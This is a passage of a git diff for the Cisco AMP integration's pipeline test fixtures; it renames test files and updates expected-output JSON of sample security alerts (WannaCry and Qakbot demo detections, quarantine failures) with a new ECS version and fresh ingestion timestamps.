}}", "kind": "alert", "start": "2021-01-14T13:29:36.000Z", @@ -3228,7 +3228,7 @@ { "@timestamp": "2021-01-14T13:28:09.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3246,7 +3246,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:10.094088127Z", + "ingested": "2021-09-13T18:07:42.929537188Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412574627503014000", "kind": "alert" @@ -3288,7 +3288,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3308,7 +3308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094089991Z", + "ingested": "2021-09-13T18:07:42.929539100Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3365,7 +3365,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3395,7 +3395,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094091860Z", + "ingested": "2021-09-13T18:07:42.929540993Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3450,7 +3450,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3480,7 +3480,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094093728Z", + "ingested": "2021-09-13T18:07:42.929542884Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3533,7 +3533,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3553,7 +3553,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094095604Z", + "ingested": "2021-09-13T18:07:42.929544781Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3608,7 +3608,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3628,7 +3628,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094097475Z", + "ingested": "2021-09-13T18:07:42.929546661Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3683,7 +3683,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3703,7 +3703,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094099331Z", + "ingested": "2021-09-13T18:07:42.929548553Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3758,7 +3758,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3778,7 +3778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094101204Z", + "ingested": "2021-09-13T18:07:42.929550429Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3833,7 +3833,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3853,7 +3853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094103078Z", + "ingested": "2021-09-13T18:07:42.929552332Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3919,7 +3919,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3951,7 +3951,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094104954Z", + "ingested": "2021-09-13T18:07:42.929554208Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -4010,7 +4010,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4040,7 +4040,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094106806Z", + "ingested": "2021-09-13T18:07:42.929556094Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4093,7 +4093,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4113,7 +4113,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094108755Z", + "ingested": "2021-09-13T18:07:42.929558092Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -4164,7 +4164,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4184,7 +4184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094110607Z", + "ingested": "2021-09-13T18:07:42.929559962Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4239,7 +4239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4259,7 +4259,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094112459Z", + "ingested": "2021-09-13T18:07:42.929561869Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 83afe6a0131..a95a5b457b6 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853984379Z", + "ingested": "2021-09-13T18:07:55.452466436Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -85,7 +85,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -115,7 +115,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853988673Z", + "ingested": "2021-09-13T18:07:55.452471500Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.e